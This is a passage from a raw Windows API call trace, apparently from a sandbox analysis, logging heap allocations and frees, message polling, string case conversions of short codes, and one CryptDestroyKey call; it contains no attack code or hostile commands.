0x2466d90 [0252.476] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0252.476] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0252.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.477] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0252.477] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.477] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0252.477] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.477] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0252.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0252.478] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.478] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0252.478] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0252.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0252.478] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0252.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0252.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.479] CryptDestroyKey (hKey=0xaa57a0) returned 1 [0252.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0252.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0252.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0252.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0252.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0252.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0252.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0252.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0252.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0252.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0252.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0252.481] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0252.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0252.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0252.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0252.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0252.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.482] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0252.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0252.482] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0252.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab38 [0252.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.483] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0252.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.483] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0252.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.484] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.484] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.484] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0252.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.484] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0252.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.484] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0252.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.485] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0252.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.485] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0252.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0252.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0252.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0252.488] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0252.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.488] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.488] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.488] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0252.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.488] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.489] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0252.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.489] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0252.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0252.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.490] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.490] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.490] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) 